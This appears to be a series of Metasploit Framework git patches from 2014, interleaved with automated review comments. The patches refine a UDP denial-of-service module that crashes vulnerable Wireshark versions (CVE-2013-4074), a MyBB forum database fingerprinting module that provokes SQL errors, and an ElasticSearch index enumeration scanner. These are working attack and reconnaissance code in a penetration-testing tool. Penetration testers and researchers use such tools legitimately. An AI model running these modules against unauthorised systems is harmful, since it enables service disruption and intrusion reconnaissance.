@@ -1,69 +0,0 @@ -# -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = GoodRanking - - include Msf::Exploit::Remote::Udp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector crash', - 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. - ) - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'j0sm1', # Exploit and msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" - ], - 'References' => - [ - [ 'CVE', '2013-4074'], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Wireshark CAPWAP dissector CRASH', - { - } - ], - ], - 'Privileged' => false, - 'DisclosureDate' => 'Apr 28 2014', - 'DefaultTarget' => 0)) - - # Protocol capwap needs port 5247 to trigger the dissector in wireshark - register_options([ Opt::RPORT(5247) ], self.class) - - end - - def exploit - - connect_udp - - # We send a packet incomplete to crash dissector - print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") - buf = "\x90" * 18 - udp_sock.put(buf) - - disconnect_udp - - end -end From 33ba1341474fed4cb31bbe0dc348c979dc3784d7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 25 May 2014 18:52:01 -0500 Subject: [PATCH 37/47] Clean msftidy warnings and metadata --- modules/auxiliary/dos/wireshark/capwap.rb | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 6555ab5dcf..c777d21b92 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb 
@@ -12,27 +12,28 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector DoS', + 'Name' => 'Wireshark CAPWAP Dissector DoS', 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. + This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 + to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an + incomplete packet. }, 'License' => MSF_LICENSE, 'Author' => [ - 'j0sm1', # Auxiliary msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + 'Laurent Butti', # Discovery vulnerability + 'j0sm1' # Auxiliary msf module ], 'References' => [ - [ 'CVE', '2013-4074'], + ['CVE', '2013-4074'], + ['OSVDB', '94091'], + ['BID', '60500'] ], 'DisclosureDate' => 'Apr 28 2014')) - # Protocol capwap needs port 5247 to trigger the dissector in wireshark register_options([ Opt::RPORT(5247) ], self.class) - end def run @@ -41,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary # We send a packet incomplete to crash dissector print_status("#{rhost}:#{rport} - Trying to crash wireshark capwap dissector ...") - # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then + # With 0x90 in this location we set to 1 the flags F and M. The others flags are sets to 0, then # the dissector crash # You can see more information here: https://www.rfc-editor.org/rfc/rfc5415.txt # F = 1 ; L = 0 ; W = 0 ; M = 1 ; K = 0 ; Flags = 000 From eacf70af83e20098efd45178caf901875884b663 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Mon, 26 May 2014 23:26:28 +0400 Subject: [PATCH 38/47] Update mybb_get_type_db.rb 26.05.2014 23:26 I deleted mimicking IE11 --- modules/auxiliary/gather/mybb_get_type_db.rb | 18 ++++-------------- 1 file changed, 4 insertions(+), 14 deletions(-) 
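Review bot: `'DisclosureDate' => 'Apr 28 2014'` is kept while this hunk ties the module to CVE-2013-4074, OSVDB 94091 and BID 60500 and narrows the affected versions to 1.8.0–1.8.7 and 1.6.0–1.6.15; the duplicate module deleted in the preceding patch credits the report to Laurent Butti on 2013-05-28, so April 2014 looks like the date the module was written rather than the public disclosure the field is meant to hold. Confirm against the Wireshark advisory for that CVE and set the date to it. The reworded description also needs a grammar fix: `This module injects a malformed UDP packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 to 1.6.15.` The second hunk only rewraps a comment.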
diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index b96e7a1a64..dd8a585a7a 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -35,18 +35,13 @@ class Metasploit3 < Msf::Auxiliary def check begin - uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') + uri = normalize_uri(target_uri.path, 'index.php') res = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'intcheck' => 1 } }) if res.nil? @@ -92,18 +87,13 @@ class Metasploit3 < Msf::Auxiliary def run - uri = normalize_uri(target_uri.path, '/memberlist.php?letter=-1') + uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'letter' => -1 } }) if response.nil? From 0133e861f84e8cea3f34cfdf38464990ff8dd14c Mon Sep 17 00:00:00 2001 From: William Vu Date: Mon, 26 May 2014 23:55:20 -0500 Subject: [PATCH 39/47] Fix typo --- lib/rex/proto/http/client_request.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 4336909510..e2d425c6c9 100644 --- a/lib/rex/proto/http/client_request.rb 
+++ b/lib/rex/proto/http/client_request.rb @@ -115,7 +115,7 @@ class ClientRequest qstr << '&' if qstr.length > 0 qstr << (opts['encode_params'] ? set_encode_uri(var) : var) - # support get paraemter without value + # support get parameter without value # Example: uri?parameter if val val = val.to_s From 1d8c46155bc1b239cedd38953bdc99effbe92500 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:14:55 -0500 Subject: [PATCH 40/47] Do last code cleaning --- modules/auxiliary/gather/mybb_get_type_db.rb | 56 +++++++++----------- 1 file changed, 26 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index dd8a585a7a..f127e03616 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -10,21 +10,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + This module checks if MyBB is running behind an URL. Also uses a malformed query to + force an error and fingerprint the backend database used by MyBB. }, - 'Author' => + 'Author' => [ #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii '#Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + 'Arthur Karmanovskii ' # Discovery and Metasploit Module ], + 'License' => MSF_LICENSE, 'DisclosureDate' => 'Feb 13 2014')) register_options( 
@@ -44,49 +40,49 @@ class Metasploit3 < Msf::Auxiliary 'intcheck' => 1 } }) - if res.nil? - print_error("Failed to retrieve webpage.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + if res.nil? || res.code != 200 return Exploit::CheckCode::Unknown end #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = " PHP Version: #{php_version}".ljust(40) + php_version = "PHP #{php_version}" else - php_version = " PHP Version: unknown".ljust(40) + php_version = "PHP version unknown" end #Check Web-Server web_server = res['Server'] if web_server - web_server = " Server Version: #{web_server}".ljust(40) + web_server = "#{web_server}" else - web_server = " Server Version: unknown".ljust(40) + web_server = "unknown web server" end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) + print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") return Exploit::CheckCode::Unknown end + rescue + return Exploit::CheckCode::Unknown + end end def run + print_status("#{peer} - Checking MyBB...") + unless check == Exploit::CheckCode::Detected + print_error("#{peer} - MyBB not found") + return + end + + print_status("#{peer} - Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { 
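Review bot: The bare `rescue` that replaces `rescue RuntimeError => err` in `check` now swallows every StandardError — a NoMethodError from a typo in this module included — and returns `CheckCode::Unknown` without printing anything, so a broken module and an unreachable host become indistinguishable. Narrow it to the transport failures that are actually expected and keep the diagnostic: `rescue ::Rex::ConnectionError, ::Timeout::Error => e` followed by `vprint_error("#{peer} - #{e.class}: #{e}")`. Separately, `res.body.match("MYBB")` is a case-sensitive substring test over the whole page, so any page that merely mentions MYBB is reported as detected; the shape of the `intcheck=1` response is not visible here, but anchoring on it rather than on a bare substring would cut false positives. The `check` method begins outside the hunk and `run` continues past it.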
@@ -97,17 +93,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("Failed to retrieve webpage.") + print_error("#{peer} - Timeout...") return end #Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") + print_good("#{peer} - Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") + print_good("#{peer} - Running SQLite Database") else - print_status("Database MySQL or this is not forum MyBB or unknown Database") + print_status("#{peer} - Running MySQL or unknown database") end end end From b96c2dd0ca38da3feb1bd3af3cf46b8414fe0876 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:15:39 -0500 Subject: [PATCH 41/47] Change module filename --- .../gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} (100%) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb similarity index 100% rename from modules/auxiliary/gather/mybb_get_type_db.rb rename to modules/auxiliary/gather/mybb_db_fingerprint.rb From 86221de10eaa9f012266658199861a924a168265 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:18:27 -0500 Subject: [PATCH 42/47] Fix message --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f127e03616..6dbdfeb160 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb 
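Review bot: The PostgreSQL signature hard-codes the default table prefix (`FROM mybb_users u`), so an installation with a non-default prefix (MyBB lets the installer choose one, as far as I recall — confirm) falls through to `Running MySQL or unknown database` even though the rest of the error text is identical; matching on `AS users FROM \w+users u WHERE 1=1 AND u\.username NOT REGEXP` keeps the fingerprint and drops the assumption. Only `response.nil?` is guarded, so a 404 or a WAF's 500 is likewise reported as MySQL-or-unknown; checking `response.code` before the body matching and `vprint_status`-ing the status would make the unknown case honest. The `print_error("#{peer} - Timeout...")` on a nil response also presumes a cause the code did not establish — `No response` is what is actually known. The `run` method starts outside the hunk.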
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = "PHP #{php_version}" + php_version = "#{php_version}" else php_version = "PHP version unknown" end From 1316365c2ff2179bfa63f38fe12ce7343ba40855 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:22:39 -0500 Subject: [PATCH 43/47] Fix description --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index 6dbdfeb160..be3a6b5acc 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -13,7 +13,8 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ This module checks if MyBB is running behind an URL. Also uses a malformed query to - force an error and fingerprint the backend database used by MyBB. + force an error and fingerprint the backend database used by MyBB on version 1.6.12 + and prior. }, 'Author' => [ From 69e82868387cf365021a0a51bd4e963710e7f1ce Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 10:29:32 -0500 Subject: [PATCH 44/47] Fix title --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index be3a6b5acc..a2beedb07c 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb 
@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'MyBB Database Fingerprint', 'Description' => %q{ This module checks if MyBB is running behind an URL. Also uses a malformed query to force an error and fingerprint the backend database used by MyBB on version 1.6.12 From cc1e81ecb75ba859e69c42eee2e3999686979e82 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 27 May 2014 10:29:55 -0500 Subject: [PATCH 45/47] Add sqlite3 to Gemfile Fixes all the post modules that require it to parse pilfered sqlite DB files. --- Gemfile | 6 ++++-- Gemfile.lock | 2 ++ 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 9045947d35..fdc185f439 100755 --- a/Gemfile +++ b/Gemfile @@ -10,12 +10,14 @@ gem 'json' gem 'msgpack' # Needed by anemone crawler gem 'nokogiri' +# Needed by db.rb and Msf::Exploit::Capture +gem 'packetfu', '1.1.9' # Needed by JSObfu gem 'rkelly-remix', '0.0.6' # Needed by anemone crawler gem 'robots' -# Needed by db.rb and Msf::Exploit::Capture -gem 'packetfu', '1.1.9' +# Needed for some post modules +gem 'sqlite3' group :db do # Needed for Msf::DbManager diff --git a/Gemfile.lock b/Gemfile.lock index 8c708c0467..5517e4fb79 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -53,6 +53,7 @@ GEM multi_json (~> 1.0.3) simplecov-html (~> 0.5.3) simplecov-html (0.5.3) + sqlite3 (1.3.9) timecop (0.6.3) tzinfo (0.3.37) yard (0.8.7) @@ -82,5 +83,6 @@ DEPENDENCIES rspec (>= 2.12) shoulda-matchers simplecov (= 0.5.4) + sqlite3 timecop yard From 3de8beb5fd3bf5d2613205fbe3b8e7f84ae9fc55 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 11:22:40 -0500 Subject: [PATCH 46/47] Clean code --- .../scanner/elasticsearch/es_enum.rb | 64 ++++++++++++++----- 1 file changed, 47 insertions(+), 17 deletions(-) 
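Review bot: `gem 'sqlite3'` is added without a version constraint, unlike the neighbouring `packetfu` pin, so although Gemfile.lock pins 1.3.9 today a `bundle update` will float to whatever is current, and since sqlite3 builds a native extension a future major release could plausibly break installs; `gem 'sqlite3', '~> 1.3'` bounds the unlocked case while still allowing patch updates. The comment `# Needed for some post modules` would be more useful naming what they do, e.g. `# Needed by post modules that parse pilfered sqlite databases`, as the commit message already says. The `packetfu` line is only moved, not changed.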
diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index 804cc8fcc9..12895c27bc 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb 
@@ -13,47 +13,77 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'ElasticSearch Enum Utility', - 'Description' => %q{ Send a request to enumerate ElasticSearch indices}, + 'Name' => 'ElasticSearch Indeces Enumeration Utility', + 'Description' => %q{ + This module enumerates ElasticSearch Indeces. It uses the REST API + in order to make it. + }, 'Author' => [ - 'Silas Cutler ' + 'Silas Cutler ' ], 'License' => MSF_LICENSE )) - + register_options( [ Opt::RPORT(9200) ], self.class) end + def peer + "#{rhost}:#{rport}" + end + def run_host(ip) + vprint_status("#{peer} - Querying indeces...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) - - begin - json_body = JSON.parse(res.body) - rescue JSON::ParserError - print_error("Unable to parse JSON") + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + vprint_error("#{peer} - Unable to establish connection") return end - if res and res.code == 200 and res.body.length > 0 - json_body.each do |index| - print_good("Index : " + index[0]) + if res && res.code == 200 && res.body.length > 0 + begin + json_body = JSON.parse(res.body) + rescue JSON::ParserError + vprint_error("#{peer} - Unable to parse JSON") + return end - - path = store_loot("elasticsearch.enum.file", "text/plain", ip, res.body, "ElasticSearch Enum Results") - print_good("Results saved to #{path}") else - print_error("Failed to save the result") + vprint_error("#{peer} - Timeout or unexpected response...") + return end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + report_service( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'elasticsearch' + ) + + indeces = [] + + json_body.each do |index| + indeces.push(index[0]) + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :type => "elasticsearch.index", + :data => index[0], + :update => :unique_data + ) end + + if indeces.length > 0 + print_good("#{peer} - ElasticSearch Indeces 
found: #{indeces.join(", ")}") + end + end + end From 2271afc1a5e7b8373067ff8d097791c523983ab5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 27 May 2014 11:25:39 -0500 Subject: [PATCH 47/47] Change module filename --- .../scanner/elasticsearch/{es_enum.rb => indeces_enum.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/elasticsearch/{es_enum.rb => indeces_enum.rb} (100%) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb similarity index 100% rename from modules/auxiliary/scanner/elasticsearch/es_enum.rb rename to modules/auxiliary/scanner/elasticsearch/indeces_enum.rb
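Review bot: The `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable` around send_request_raw misses connection timeouts and resets, so a filtered or slow host raises out of `run_host` instead of being reported; those are all subclasses of `::Rex::ConnectionError` to the best of my knowledge, so `rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Timeout::Error` covers them. `json_body.each do |index| ... index[0]` assumes the parsed body is a Hash keyed by index name; an error document or a JSON array would yield nonsense or raise here, so add `return unless json_body.is_a?(Hash)` after the parse. Finally, `Indeces` is a misspelling of `Indices` in the Name, the messages and the `indeces` local, and the rename in the following patch bakes it into the filename `indeces_enum.rb`, which is far harder to correct later. The module class starts outside the hunk.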